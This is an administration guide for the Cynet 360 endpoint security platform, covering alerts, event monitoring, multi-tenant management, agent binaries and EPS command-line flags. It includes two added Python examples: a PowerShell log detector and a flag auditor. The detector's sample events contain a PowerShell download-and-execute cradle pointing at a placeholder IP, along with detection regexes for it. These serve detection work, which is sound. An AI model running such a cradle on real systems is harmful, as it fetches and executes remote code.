Email Alert Recipients: The email addresses that receive an email when the system generates an alert. Separate multiple addresses with commas.
SMTP Server: The IP address of the organization’s SMTP server, which transports the alert emails generated by the system.
SMTP SSL: Enable if the SMTP server requires an SSL/TLS connection for sending mail. Without it, the alert emails are sent in clear text.
Email Alert Sender: Controls the “From” field in email alerts generated by the system.

General Settings

You can specify the SIEM server to which the Cynet server sends syslog messages. To define a SIEM server, enter its IP address and port number.

The default port is 514.

Note

If the SIEM Connectivity settings are changed to a port other than the default (port 514), the Cynet services must be restarted on the server for the change to take effect.

Configuring Alert Settings

You can configure Alert Settings for the types of alerts to be enabled. Operators can exclude or filter out certain types of alerts.

Note

Cynet recommends that all alert types are enabled, so that every type of threat Cynet detects generates an alert.

To configure the Alert Settings, from the Settings page, select the Alerts tab and scroll down to the Alert Settings section.

You can enable the following Alert Settings:

Port Scanning Alerts: Enables alerts for port scanning detection. Detection is only possible if “Network Attacks Detection” is enabled in the “Scan Groups” settings.
Ransomware Alerts: Enables alerts for ransomware detection.
ARP Poisoning Alerts: Enables alerts for ARP poisoning detection.
Pass-the-Hash Alerts: Enables alerts for pass-the-hash detection.
Critical Pass-the-Hash Alerts: Enables alerts for critical pass-the-hash detection.
Show Mimikatz Alerts: Enables alerts for Mimikatz detection.
Powershell Empire Alerts: Enables alerts for PowerShell Empire detection.
VSSAdmin Alerts: Enables alerts for VSSAdmin detection.
DNS Tunneling Alerts: Enables alerts for DNS tunneling detection. Detection is only possible if “Network Attacks Detection” is enabled in the “Scan Groups” settings.
ICMP Tunneling Alerts: Enables alerts for ICMP tunneling detection. Detection is only possible if “Network Attacks Detection” is enabled in the “Scan Groups” settings.
SMB Scanning Alerts: Enables alerts for SMB scanning detection. Detection is only possible if “Network Attacks Detection” is enabled in the “Scan Groups” settings.
Brute Force Alerts: Enables alerts for brute force attempt detection.
Hacking Tool Alerts: Enables alerts for hacking tool detection. Detection is only possible if “Credential Decoy Detection” is enabled in the “Scan Groups” settings.
Remote Access Tool Alerts: Enables alerts for remote access tool detection.
Trojan Alerts: Enables alerts for trojan detection.
HTTP Tunneling Alerts: Enables alerts for HTTP tunneling detection. Detection is only possible if “Network Attacks Detection” is enabled in the “Scan Groups” settings.

Unscanned Host Alert Settings

You can use these settings to generate alerts for specific hosts that are not being scanned by Cynet.

To add a host to the list:

Enter a few letters of a Hostname.

When the Hostname you want appears in the drop-down menu, select it from the menu.

Click Add.

To remove a host, select the host from the list and click Delete.

Email Alert Filter Settings

You can use the Email Alert Filter settings to set the minimum severity of alerts that are sent by email. By default, Cynet 360 sends alerts of all severity levels.

To configure the Email Alert Filter Settings:

From the Settings page, select the Alerts tab and navigate to the Email Alert Filter Settings section.

From the drop-down menu, select the required minimum level:

Informative: Sends alerts of all severity levels to email recipients

Low: Sends only Low, Medium, High, and Critical severity alerts to email recipients

Medium: Sends only Medium, High, and Critical severity alerts to email recipients

High: Sends only High and Critical severity alerts to email recipients

Critical: Sends only Critical severity alerts to email recipients

Click Save.

File Monitoring

The Cynet solution includes file monitoring capabilities that extend file-based forensic visibility from mainly executables to all file activity on the protected asset.

The monitoring capabilities provide visibility into the following actions:

• File Access

• File Deleted

• File Renamed

• File Executed

• File Created

Enabling the file monitoring feature requires several steps:

  1. Configure the Cynet analytic server (shared with additional advanced Cynet features).

  2. In the Scan Group Settings page, enable File Monitoring.

  3. Configure which file types to collect from the endpoints: on the Settings page, Advanced tab, File Monitoring section, configure the file extensions that Cynet monitors on disk.

Because every monitored file event is collected by the EPS, it is ill-advised to monitor all extensions by default: doing so places a heavy load on the Cynet EPS and can affect the performance of the end-customer machine.

Best practice recommendations are available (refer to the dedicated file monitoring installation guide).

Once configured, the data collected is displayed in the Forensic tab, in the file monitoring dashboard under the Files pillar.

The dashboard offers filters at the top of the screen to narrow the view by action type and by key parameters such as Username or ProcessSHA256.

To query the collected data in more depth, use the free text search option, which runs queries against the raw event data.

Expanding a single file event with the + control presents all the collected data, parsed and indexed as key-value pairs.

Windows Events

Cynet enables log collection from Windows-based hosts using the Cynet EPS agent deployed on the protected asset. The collection is empty by default and requires a number of steps to be enabled:

  1. Configure the Cynet analytic server (shared with additional Cynet functions such as file monitoring; see Appendix A, step 1).

  2. In the Scan Group Settings page, enable Windows Event Monitoring.

  3. Configure which event types to collect from the endpoints: the Windows Events section of the Settings page shows an overview of the events currently configured for collection. By default it is empty.

For example, the overview might show event 4103 collected from two scan groups and event 4104 collected from a single group.

You can create additional collection policies with the Create button, specifying the log type and event ID in the upper section, or collecting custom fields for more advanced logs in the lower section.

Once the data is collected, you can drill into the collected Windows events inside the forensic dashboard under the hosts pillar Windows Events section:

The main Windows event dashboard is unfiltered and lets you go over all the events collected in the environment. You can use the top section to filter by key values such as Host, Event ID, or specific Event Types.

To query the collected data in more depth, use the free text search option, which runs queries against the raw event data.

Expanding a single event with the + control presents all the collected data, parsed and indexed as key-value pairs.
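Once 4103 and 4104 events are being collected, a practitioner will want to run some detection logic over them. In the Microsoft-Windows-PowerShell/Operational log, event 4104 (script block logging) records the script text that was executed and event 4103 (module logging) records pipeline execution together with its host application context. The following is an added example, not Cynet code: the event records, field names, host names and indicator patterns are constructed for illustration, and Cynet’s own parsed key names, which the page does not list, are not assumed.

```python
"""Flag suspicious PowerShell activity in collected 4103/4104 Windows events.
Added example, not Cynet code. The event records below are constructed."""
import base64
import re

# Constructed events, shaped like the message fields of 4104 (ScriptBlockText)
# and 4103 (Payload, ContextInfo) in Microsoft-Windows-PowerShell/Operational.
EVENTS = [
    {"host": "WS01", "event_id": 4104, "ScriptBlockText": "Get-ChildItem C:\\Users"},
    {"host": "WS02", "event_id": 4104,
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"},
    {"host": "WS03", "event_id": 4103,
     "Payload": "CommandInvocation(Invoke-Expression): \"Invoke-Expression\"",
     "ContextInfo": "Host Application = powershell.exe -nop -w hidden -enc SQBFAFgAIAAoACcAaABpACcAKQA="},
    {"host": "WS04", "event_id": 4688, "NewProcessName": "C:\\Windows\\notepad.exe"},
]

# Patterns that usually warrant a second look (an assumption for illustration,
# not a complete rule set).
INDICATORS = {
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand carries UTF-16LE text in base64; decode it so the
    indicators can also be matched against the hidden script. Returns ''
    when the blob is not valid base64 or not valid UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def text_of(event: dict) -> str:
    """Collect the free-text fields a 4103/4104 event carries."""
    return " ".join(str(event.get(k, "")) for k in ("ScriptBlockText", "Payload", "ContextInfo"))


def triage(events: list) -> list:
    """Return (host, event_id, sorted indicator names) for every PowerShell event
    that matches at least one indicator; other event IDs are ignored."""
    hits = []
    for ev in events:
        if ev.get("event_id") not in (4103, 4104):
            continue
        text = text_of(ev)
        m = INDICATORS["encoded_command"].search(text)
        if m:
            # Append the decoded script so indicators inside it are also seen.
            text += " " + decode_encoded_command(m.group(1))
        names = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
        if names:
            hits.append((ev["host"], ev["event_id"], names))
    return hits


if __name__ == "__main__":
    for host, event_id, names in triage(EVENTS):
        print(host, event_id, ", ".join(names))
```

The -EncodedCommand blob is base64 of UTF-16LE text, so the example decodes it and matches the indicators against the hidden script as well; the constructed blob decodes to IEX ('hi'). Hits are returned as a list rather than only printed so they can feed a ticket or a SIEM forward.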

Multi-Tenant Architecture

General Overview

Cynet offers a multi-tenant architecture built to fit the requirements of managed security service providers (MSSPs) and large enterprise customers.

The multi-tenant architecture is delivered using multiple servers hosting Cynet application and database services. Several architectures are possible: some are built from simple single servers (a single-site approach), while others use components designed for scale, such as Docker-hosted sites and additional Cynet components.

In both cases, each server instance is called a “site” and is managed by a server acting as the Global Manager.

This multi-tenant approach enables the Global Manager to provide a single surface for all activities related to operating multiple sites.

Once the Global Manager server is configured and connected to all of the sites, a new set of capabilities appears in the UI. These enable navigation between the sites according to the User’s privileges, and the ability to view and take actions on the entire environment, such as specifying a central security policy or creating a new site.

Site Navigation

Site navigation is the most basic control: it enables the User to move between the servers that are managed by and connected to the Global Manager. The default view for global Operators and for Users who have access to multiple sites is the “ALL” option, which provides full visibility and control (subject to the User’s access privileges) over all of the environments.

*Selecting a site navigates to the single site dashboard giving the same look and feel as a single standalone server.

Global Views

Through the Global Manager, the User can access summarized alert and forensic data from all sites in the global dashboards, each of which provides a different view of the environment.

Global Alert view

When the “All” site is selected, the Alerts tab in the Global Manager displays all the alerts triggered across all sites. Each alert is presented as it would appear in a standalone site interface, with additional information about the originating site shown on the right.

The User can view the overview details for quick reference, see the alert’s originating site and its general status in the global environment, and expand the alert to view all the relevant forensic metadata without drilling into the single-site interface.

Global Forensic View

Inside the “All” forensic view, the User can receive an overview of all the various forensic artifacts collected by Cynet, divided into several pillars. The information collected contains some of the metadata to provide a quick check across the environment. Clicking a forensic object directs the User to the full forensic data inside the site.

Global Forensic Files

The Global Forensic Files view displays all the executable files running across the environment. The User can enter a specific file name or SHA256 and receive an immediate response if it is a file that ran in the environment. Clicking on a file or SHA256 takes the User directly to the site forensic page where the file was executed.

Global Forensic Hosts

The Global Forensic Hosts view provides a quick summary of all hosts across sites, and an easy way to find a specific asset from the basic key information associated with it.

Clicking on the asset drills down to the host forensic page of the specific site where the host resides.

Global Forensic Users

The Global Forensic Users view provides a quick overview of all Users that exist in the environment across sites. The common use case is to identify a User as part of an investigation, or quickly understand when the last login of a specific User took place.

Clicking on a User opens the Users forensic area inside the site where that User resides.

Global Forensic Domains

In the Global Forensic Domain view, the User can quickly identify remote domain access and identify how many Hosts or Users have access to specific domains.

Clicking on a domain takes the User to the Domain Forensic page inside the site where the domain was accessed.

Global Audit log

Auditing information is collected in the Global Manager server and all access is monitored across the sites. The activities performed are also logged, and this information can be exported to a SIEM platform or other third parties using Syslog.

Global User Configuration

Once Users are created, there are two levels of permission assigned to them.

  1. Site Access Rights

These specify the sites to which the User has login access. A User with access to a single site has the normal standalone Cynet experience, without global dashboards. Access to multiple sites enables the global dashboard views and site navigation.

  2. User Access Privilege

Each site access is mapped to a permission level. A User may have custom permissions or Operator rights on one or more sites. The User privileges define the actions the User can take and the views to which they have access.

In multi-tenant environments there is an additional privilege level, Global Operator, which maps to full administration of the environment: a global Operator has full access to all of the sites. Additional rights relate to Global Manager operations, such as creating further global Operators, creating new sites, and performing maintenance on sites already managed by the Global Manager.

Once a User is created and mapped to permissions, modifying the permissions or adding permissions for a new site is performed via the User Permission matrix.

SIEM Integration

When SIEM integration is configured through a Global Manager, the Global Manager site itself can be integrated, giving the SIEM visibility into activities at the Global Manager level. In addition, the User can configure each site’s SIEM integration centrally from the same interface.

Global Site Security Configuration

The Global Manager provides central administration of all the sites, giving a quick way to set the security policy for every site it manages. The User can establish a global policy that enforces a template across all of the sites, or modify the configuration on a per-site basis via the Central Scan Group menu.

Selecting a feature from the list of Cynet capabilities presents the feature’s options as checkboxes that the User can enforce globally or per scan group on each site.

Each site connected to the Global Manager reports all of its scan groups and their settings, kept up to date with the site’s current configuration. This enables the User to view the applied settings and configure them from a single dashboard.

Global Manager

This section describes the features of the Global Manager.

Global Operator

The permission level of a global Operator enables the User to manage site creation and perform other maintenance operations on the Global Manager level. On top of the administrative rights to the Global Manager server, a global Operator has full administrative access to all the sites managed by the Global Manager server.

Client Site Manager

Site Status

The Global Sites status displays the current connectivity status of all the sites in the environment. It reflects the connectivity of the Global Manager to each site and acts as a basic health indicator for the site itself.

The client ID shown next to each site is the ID that the customer instance has with Cynet for license activation and as the contact ID for the CyOps SOC team.

Cloud Sync represents the health of the connection between the Cynet site server and the Cynet VPC back office cloud.

This is a crucial connection: it is the pipeline for some of Cynet’s security capabilities, for threat intelligence, and for remote assistance from the Cynet SOC team in monitoring alerts and assisting in investigation and incident response.

Create Site

Site creation in a global MSSP environment has two main options, depending on the infrastructure and architecture of the environment.

In a simple global environment, each new site is a standalone server (physical or virtual), which must be installed and configured as a standalone Cynet server before it is connected to the Global Manager.

In an advanced global environment, which adds the central management worker services and additional servers hosting the Hosts Server and Docker Server, sites are created as virtual services in Docker instances, and the auto deployment tool can create sites automatically.

Users can create new sites automatically with the auto deployment tool by specifying the contact details of the site owner or point of contact and a Client ID, which is provided by Cynet or acquired as part of an ongoing MSSP license agreement.

Auto-Deployed Sites Action

This displays the status of actions performed using the auto-site deployment tool. The following information is important for Client deployment purposes:

Token: The unique identifier that agents use to connect to their site server. Because a dynamic traffic router routes an agent to its site on the basis of this token, handle it as sensitive configuration.

Action: Logs the action relevant to the site (such as creation, deletion).

Status: Presents the outcome of the performed action. Starts as pending and goes towards either success or failure.

*All actions have a default fail time and retry mechanism. For more details refer to the Global Manager Installation Guide.

Client Sites

Once a site is created, it appears under the client sites with information relating to the server IP and port binding to both the API and DB, which is required for the Global Manager to connect and manage the site.

Site deletion is performed using the Remove button.

Site renaming is performed using the Edit button.

 

Distributed Architecture


Traffic Router

The Traffic Router is a Cynet proxy component that acts as a gateway between the protected Cynet assets and the Cynet server.

Traffic routers are used in several use cases:

  • Single site roaming devices support (DMZ)
  • Single site isolated network
  • Multi-site environments (MSSP)

Traffic routers have two modes of operation based on the required use case:

Static Mode

In Static Mode the traffic router forwards all agent traffic to the configured next hop, the Cynet server.

This scenario supports roaming devices or sub-networks that are not directly connected to the Cynet server.

By placing the traffic router in the DMZ with a publicly reachable address, the User can have roaming assets connect to the traffic router, which forwards their traffic to the Cynet server transparently to the protected asset.

The DMZ approach limits the Cynet server’s exposure to external threats and improves the overall security architecture for protecting roaming devices.

Dynamic Mode

In multi-tenant environments, a traffic router is mandatory, because the traffic router is responsible for directing connected agents to their Cynet site server.

When configured as a dynamic traffic router, a connection to the Global Manager lets the traffic router receive the list of all active tokens and their site mappings, so that it knows which sites are available. When an agent connects to the traffic router in this mode, the agent’s token is validated against the known sites and, if it matches, the traffic is forwarded to that site’s Cynet server.

Master/Slave architecture


The Master server needs access to the Slave server(s) database to retrieve all data related to the Slave server’s scanned endpoints. This connection uses TCP port 3333. The Slave server communicates with the Master server through the web console API on TCP port 8443. Because port 3333 exposes the site database, restrict it at the firewall to the Master server’s address.

Note

The default web console listening port is TCP 8443. However, this can be changed in the configuration settings. The connection from a Slave server to a Master server must be on the configured Web console port for the Master server.

System Components

Understanding Cynet Binaries

The following are binaries used by Cynet 360 to scan endpoints. See the “Cynet Server Services” section for more information about the executables and services that run on the Cynet server for analysis, detection, and remediation of threats.

Executables (Windows)

The following executable is run from the C:\Windows\ directory:

CynetEPS.exe

The Endpoint Scanner (EPS) process is deployed by the Cynet 360 server to Windows endpoints to be scanned. It deploys certain child processes (see below) and collects indicators from files, Users, hosts, and network data for threat analysis. This process handles all communication between the endpoint and the Cynet server.

The following are child processes dynamically spawned by CynetEPS.exe:

CynetMS.exe – The Memory Scanner (MS) process scans memory usage by running processes for malicious activity.

CynetAR.exe – The Auto Run (AR) process collects data about autorun entries, drivers, tasks, and services for processes scheduled to run at boot (persistence).

CynetGW.exe – The GUI Window (GW) process collects data regarding Windows activity for each process, to detect processes running in hidden windows.

CynetSD64.exe – The Software Dev 64-Bit (SD64) process collects DLL dependencies for 64-bit processes running on the system. Since the CynetEPS is running as a 32-bit process, the CynetSD64 process is necessary to collect this data from 64-bit processes.

CynetLauncher.exe – The Launcher executable is a remote execution process that runs on endpoints to distribute the CynetEPS executable for scanning.

CynetDS.exe – The Deep Scan executable runs on endpoints for forensic analysis of a specified process. The CynetDS can only monitor one process per host at a time, but multiple hosts can have the deep scan running at the same time. See “Deep Scan Settings” for more information.

CynetRunner.exe – The Runner executable is deployed to endpoints when certain remediation actions are used. When “Run Command” or “Run File” actions are used, this process handles the execution of the action, and collects the response output. The output can then be viewed in the console interface.

CynetRunner64.exe – The 64-bit version of the CynetRunner.exe process (see above).

Daemons (Linux & Mac)

The following daemon is run from the /opt/Cynet/ directory:

CynetEPS

The Endpoint Scanner (EPS) daemon is deployed by the Cynet 360 server to Linux or Mac endpoints to be scanned. It collects indicators from files, Users, hosts, and network data for threat analysis. This process handles all communication between the endpoint and the Cynet server.

Cynet Services

The following services are used by Cynet 360 for various purposes. They are grouped into services that run on the server and services that run on the scanned endpoints in the environment.

Cynet Server Services

The services listed below are only found on the Cynet server for processing scan data from scanned endpoints.

CSHelper (cshelper.exe) – The CSHelper service acts as a watchdog service for the other Cynet services on the server. It constantly checks that all other Cynet services are running and automatically restarts any that are not currently running. This service can also check if updates to the Cynet server version exist. If the system is configured for automatic updates, it begins the update process and restarts the Cynet services after the update has completed.

Cynet (cynet.exe) – The Cynet service is the central service, which coordinates actions between all other Cynet services. It performs start-up checks, performs database updates or maintenance if necessary, runs threat analysis queries, sends heartbeats to the Cynet VPC, performs threat intelligence queries, sends files to the sandbox for analysis, and performs remediation actions on endpoints (whether taken manually or through auto-remediation).

CynetListener (cynetlistener.exe) – The CynetListener service is responsible for listening for raw scan data coming in from endpoints. This service places this data in a temporary queue where it is processed by the CynetProtobufHandler service, when available.

CynetProtobufHandler (cynet.protobufprocessor.exe) – The CynetProtobufHandler service is responsible for processing raw scan data collected from endpoints by the server and processing the data so it can be stored in the appropriate database location.

Redis (redis-server.exe) – The Redis service is a queue application responsible for the communication between the Cynet database and the frontend Web interface. The queuing provides quick page loads when using the Web interface, especially with actions that require complex queries to the database.

[OPTIONAL] CynetSyslog (Cynet.Syslog.exe) – The CynetSyslog service can be configured to run a syslog listener. This service accepts incoming syslog messages through a configured port and archives them on the Cynet server. The Cynet server can also be configured to parse syslogs (see “Configuring Log Parser Settings”).

Endpoint Services (Windows)

The service listed below is installed on any Windows host with the Light Agent installed.

CynetLauncher

This service is created when the light agent is installed on a Windows host. This service runs the CynetLauncher.exe once at boot up, which invokes the CynetEPS process on the endpoint with the necessary command-line parameters.

Note

The CynetLauncher service does not stay in the ‘Running’ state after it is run. To verify that the light agent is running, open the Windows Task Manager and check that the CynetEPS process is running.

Endpoint Services (Linux)

The service listed below is installed on any Linux host with the Light Agent installed.

Cyservice

This service is created when the light agent is installed on a Linux host. This service starts the CynetEPS daemon when the system boots. It is placed in the /etc/init.d/ directory.

Endpoint Services (Mac)

The service listed below is installed on any Mac host with the Light Agent installed.

com.cyneteps.service.plist

This service is created when the light agent is installed on a Mac host. This service starts the CynetEPS daemon when the system boots. It is placed in the /Library/LaunchDaemons/ directory.

CynetEPS Command-Line Flags

The CynetEPS process that runs on Windows endpoints accepts several command-line flags that activate or deactivate certain functionality of the Cynet scanner while it scans endpoints. The flags can be seen in the “Command Line” column in the Windows Task Manager.

A typical CynetEPS execution with a full command-line of flags can look like this:

CynetEPS.exe 192.168.200.100 -port 443 -cpulimit 15 -scanid 52 -alwayson -driver -donetworkcheck -adthransom -adthdokill -ualert -fh -fhdokill

Note

The first command-line argument specifies the IP address of the Cynet server. It is a required argument for the CynetEPS to run. There is no flag to define this argument.

The table in the following section contains a list of the command-line flags and values that are available to control the functionality of the CynetEPS. These flags are set at the time of execution and are typically set by the Cynet server when scanning endpoints. They may also be used to set the default configuration of the Light Agent during agent installation. Consult Cynet support for any questions regarding these flags.

Flag    Description
-port <port>    This flag, along with a port number, defines the port the EPS uses when sending scan data back to the Cynet server.

Example: -port 443

-secip <ip>    This flag, along with an IP address, defines a secondary IP address for the EPS to send scan data to. This IP address is used only if the primary IP address (specified in the first command-line argument) is unavailable.

Example: -secip 192.168.100.200

-secport <port>    This flag, along with a port number, defines the port the EPS uses when sending scan data to the secondary IP address.

Example: -secport 8443

-cpulimit <value>    This flag, along with a numeric value, defines the maximum CPU usage (in percent) that the CynetEPS and CynetMS processes together can consume when scanning the host. 60% of this value is allocated to the CynetEPS process and the remaining 40% to the CynetMS process.

Example: -cpulimit 15

(9% to CynetEPS, 6% to the CynetMS)

-memsize <value>    This flag, along with a numeric value, defines the maximum memory (in Megabytes) that the CynetEPS and CynetMS processes can consume when scanning the host. The limit applies to each of the two processes separately.

Example: -memsize 300

-heartbeat <value>    This flag, along with a numeric value, defines the interval (in seconds) at which the CynetEPS sends a heartbeat to the Cynet server. The default value is 300 (5 minutes).

Example: -heartbeat 15

-donetworkcheck    This flag enables the CynetEPS to perform an Internet connectivity check. The result is factored into the risk score analysis.

Example: -donetworkcheck

-nomemstr    This flag disables memory string collection by the CynetEPS when it analyzes processes on endpoints during scanning.

Example: -nomemstr

-ps <ip>    This flag, along with the host’s IP address, makes the EPS bind to the NIC configured with that IP address in order to detect network-based attacks.

Example: -ps 192.168.1.10

-pps <value>    This flag, along with a numeric value, defines the maximum number of network packets the CynetEPS analyzes per second. If this limit is exceeded, the Network Monitor within the CynetEPS enters sleep mode until it has finished analyzing all packets in the current queue.

Example: -pps 10000

-ualert    This flag enables the CynetEPS to display a pop-up on the endpoint desktop that notifies the User when Cynet generates an alert.

Example: -ualert

-driver    This flag makes the CynetEPS install a driver on the system for self-protection mode. This mode ensures that the EPS process cannot be killed on the host. The driver also provides kernel-level visibility.

Example: -driver

-driverblockraw    This flag enables blocking of any attempt to write to the MBR.

Example: -driverblockraw

-driverkillraw    This flag enables automatic remediation of any attempt to write to the MBR: any process that was blocked from writing to the MBR is killed.

Example: -driverkillraw

-driverloghandle    This flag enables logging of process handles on scanned endpoints. This flag is typically only used for troubleshooting.

Example: -driverloghandle

-debugconfig    This flag stores all scan data in an unencrypted, human-readable data file on the endpoint. Because the collected data is written in the clear, this flag is typically only used for troubleshooting.

Example: -debugconfig

-disableupdate    This flag prevents the CynetEPS from automatically updating its arguments from the Cynet server. This flag is typically only used for troubleshooting.

Example: -disableupdate

-showconsole    This flag makes the CynetEPS display all activity in a command prompt at execution. This flag is typically only used for troubleshooting.

Example: -showconsole

-savelog (-loglevel <value>)    This flag enables the CynetEPS to log all activity to a log file located at C:\Windows\clog\CynetEPSLog.txt. Optionally, the -loglevel flag can be used in conjunction with it to specify which types of events are saved in the log. This flag is typically only used for troubleshooting.

Log Levels:

all

trace

debug

info (default)

warn

error

fatal

off

Example: -savelog

Example: -savelog -loglevel all

Example: -savelog -loglevel 1

-debugms    This flag enables the CynetMS to log all activity to a log file located at C:\Windows\System32\CynetLoggerMS.txt or C:\Windows\CynetLoggerMS.txt (depending on the working directory). This flag is typically only used for troubleshooting.

Example: -debugms

-savejson    This flag makes the CynetEPS create JSON files locally that mirror the data files sent back to the Cynet server (called PCQ files). These JSON files are typically saved to C:\Windows\system32\CynetEPSJson#.file. This flag is typically only used for troubleshooting.

Example: -savejson

-savezip    This flag makes the CynetEPS save all PCQ files to a single ZIP file, typically saved as C:\windows\CynetEPSJson.zip. This flag is typically only used for troubleshooting.

Example: -savezip

-osharecycle <value>    This flag, along with a numeric value, defines the minimum time (in minutes) the CynetEPS takes to collect information from a remotely opened file.

Example: -osharecycle 3

-fh    This flag enables the Fuzzy Hashing detection mechanism. With fuzzy hashing, Cynet mathematically measures similarity between code to detect variants of known malware.

Example: -fh

-fhdokill    This flag enables remediation of threats detected using the Fuzzy Hashing technique: detected processes are killed automatically.

Example: -fhdokill

-decoy    This flag enables the CynetEPS to monitor for brute-force attempts against decoy files and Users that were deployed to the endpoint.

Example: -decoy

-adtdisable    This flag disables the ADT (Advanced Detection Technology) heuristic engine on the CynetEPS. The engine is enabled by default unless this flag is set. Cynet does NOT RECOMMEND disabling this feature, as it is an important mechanism for threat detection.

Example: -adtdisable

-adthdokill    This flag enables the CynetEPS to automatically kill processes that the ADT Heuristic Engine determines to be malicious.

Example: -adthdokill

-adthransom    This flag enables the ransomware detection mechanism in the ADT Heuristic Engine.

Example: -adthransom

-adtnodecoy    This flag disables the decoy file feature used for ransomware detection in the ADT Heuristic Engine. With this feature, hidden decoy files are deployed to specific locations on the file system to detect ransomware. Cynet does NOT RECOMMEND disabling this feature, as it affects the ability to detect new variants of ransomware.

Example: -adtnodecoy

-adtdecoylimit <value>    This flag, along with a numeric value, defines the maximum disk space (in Megabytes) that the ransomware heuristic decoy files can use.

Example: -adtdecoylimit 100

-adtnoproccb    This flag disables…

Example: -adtnoproccb

-fastscan    This flag enables the CynetEPS to detect threats using external threat intelligence.

Example: -fastscan

-fastscandokill    This flag enables the CynetEPS to automatically remediate threats detected using external threat intelligence.

Example: -fastscandokill
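The Python script below is an added example written for this guide; it is not Cynet code. It parses a CynetEPS command line of the form shown above (server IP first, then flags) and audits it against the flag table: it separates value flags from switches, computes the documented 60/40 split of -cpulimit between CynetEPS and CynetMS, and reports flags the table marks as troubleshooting-only or NOT RECOMMENDED, flags whose prerequisite is missing (for instance -fhdokill without -fh, or -adthdokill alongside -adtdisable), and flags that do not appear in the table at all. The REQUIRED_FLAGS policy set (-driver, -adthransom, -fh), the dependency pairs inferred from the descriptions, and the two sample command lines are assumptions constructed for the example; the first sample is the typical line shown above with its dashes normalised. To audit a live agent, paste in the value of the Command Line column from the Windows Task Manager.

```python
"""Parse and audit a CynetEPS command line against the flag table above.
Added example for this guide, not Cynet code; REQUIRED_FLAGS and DEPENDENCIES
are assumptions for illustration, not Cynet defaults."""
import shlex
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

# Flags documented above as taking a value; the rest are plain switches.
VALUE_FLAGS: Set[str] = {"port", "secip", "secport", "cpulimit", "memsize",
                         "heartbeat", "ps", "pps", "loglevel", "osharecycle",
                         "adtdecoylimit"}
SWITCH_FLAGS: Set[str] = {
    "donetworkcheck", "nomemstr", "ualert", "driver", "driverblockraw",
    "driverkillraw", "driverloghandle", "debugconfig", "disableupdate",
    "showconsole", "savelog", "debugms", "savejson", "savezip", "fh",
    "fhdokill", "decoy", "adtdisable", "adthdokill", "adthransom",
    "adtnodecoy", "adtnoproccb", "fastscan", "fastscandokill"}
# "Typically only used for troubleshooting" / "NOT RECOMMENDED" per the table.
TROUBLESHOOTING_FLAGS: Set[str] = {"driverloghandle", "debugconfig", "disableupdate",
                                   "showconsole", "savelog", "debugms", "savejson",
                                   "savezip"}
NOT_RECOMMENDED_FLAGS: Set[str] = {"adtdisable", "adtnodecoy"}
REQUIRED_FLAGS: Set[str] = {"driver", "adthransom", "fh"}  # assumed site policy
# (flag, prerequisite) pairs implied by the descriptions: kill-on-detect needs
# its detector, MBR protection lives in the driver, -secport needs -secip.
DEPENDENCIES = [("fhdokill", "fh"), ("driverblockraw", "driver"),
                ("driverkillraw", "driver"), ("secport", "secip")]


@dataclass
class EpsCommandLine:
    server_ip: str
    switches: Set[str] = field(default_factory=set)
    values: Dict[str, str] = field(default_factory=dict)


def _is_flag(token: str) -> bool:
    # Accept "-flag", "--flag" and the en dash some renderings of the guide show.
    return token.startswith(("-", "\u2013"))


def parse_eps_command_line(cmdline: str) -> EpsCommandLine:
    """Parse 'CynetEPS.exe <server-ip> [-flag [value] ...]'. The first positional
    argument is the server IP (no flag); documented value flags consume the next
    token, and an undocumented flag followed by a non-flag token is assumed to
    take that token as its value (e.g. -scanid 52 in the typical line)."""
    argv = shlex.split(cmdline, posix=False)  # keeps quoted Windows paths intact
    if len(argv) < 2 or _is_flag(argv[1]):
        raise ValueError("expected: CynetEPS.exe <server-ip> [flags]")
    cfg = EpsCommandLine(server_ip=argv[1])
    i = 2
    while i < len(argv):
        tok = argv[i]
        if not _is_flag(tok):
            raise ValueError(f"unexpected positional argument: {tok}")
        name = tok.lstrip("-\u2013").lower()
        nxt = argv[i + 1] if i + 1 < len(argv) else None
        takes_value = name in VALUE_FLAGS or (
            name not in SWITCH_FLAGS and nxt is not None and not _is_flag(nxt))
        if takes_value:
            if nxt is None:
                raise ValueError(f"-{name} requires a value")
            cfg.values[name] = nxt
            i += 2
        else:
            cfg.switches.add(name)
            i += 1
    return cfg


def cpu_budget(cpulimit: int) -> Tuple[float, float]:
    """Split -cpulimit 60/40 between CynetEPS and CynetMS, as documented."""
    return cpulimit * 3 / 5, cpulimit * 2 / 5


def audit(cfg: EpsCommandLine) -> List[str]:
    """Return findings for a parsed command line; an empty list means it passed."""
    present = cfg.switches | set(cfg.values)
    findings: List[str] = []
    for f in sorted(REQUIRED_FLAGS - present):
        findings.append(f"missing required flag -{f}")
    for f in sorted(present & NOT_RECOMMENDED_FLAGS):
        findings.append(f"-{f} is set but not recommended by the guide")
    for f in sorted(present & TROUBLESHOOTING_FLAGS):
        findings.append(f"troubleshooting flag -{f} left enabled")
    if "adthdokill" in present and "adtdisable" in present:
        findings.append("-adthdokill has no effect while -adtdisable turns off the ADT engine")
    for flag, needs in DEPENDENCIES:
        if flag in present and needs not in present:
            findings.append(f"-{flag} requires -{needs}")
    for f in sorted(present - VALUE_FLAGS - SWITCH_FLAGS):
        findings.append(f"undocumented flag -{f}; confirm with Cynet support")
    return findings


# Constructed samples (not captured from a real host): the guide's typical line
# with dashes normalised, and a deliberately misconfigured line.
SAMPLE_TYPICAL = ("CynetEPS.exe 192.168.200.100 -port 443 -cpulimit 15 -scanid 52 "
                  "-alwayson -driver -donetworkcheck -adthransom -adthdokill -ualert "
                  "-fh -fhdokill")
SAMPLE_BAD = ('"C:\\Program Files\\Cynet\\CynetEPS.exe" 10.0.0.5 -port 443 -secport 8443 '
              "-fhdokill -adtdisable -adthdokill -debugconfig -savelog -loglevel all")

if __name__ == "__main__":
    for line in (SAMPLE_TYPICAL, SAMPLE_BAD):
        print(line.split()[1], audit(parse_eps_command_line(line)) or "no findings")
```

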